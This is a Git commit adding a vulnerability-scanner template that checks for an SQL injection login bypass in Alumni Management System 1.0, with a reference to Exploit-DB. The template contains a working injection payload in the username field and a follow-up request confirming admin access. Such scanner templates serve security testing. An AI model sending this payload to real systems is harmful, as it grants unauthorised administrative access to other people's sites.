Create alumni-sqli.yaml

patch-1
Arafat Ansari 2022-07-21 13:16:42 +05:30 committed by GitHub
parent 275f402d7e
commit 467d8ecc6a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: alumni-sqli
info:
name: Alumni Management System 1.0 - SQLi Authentication Bypass
author: arafatansari
severity: high
description: |
Alumni Management System Login page can be bypassed with a simple SQLi to the username parameter.
reference:
- https://www.exploit-db.com/exploits/48883
tags: sqli,bypass,cms
requests:
- raw:
- |
POST /alumni/admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3D'1'%23&password=nuclei
- |
GET /alumni/admin/index.php?page=home HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Welcome back Admin!'
- type: status
status:
- 200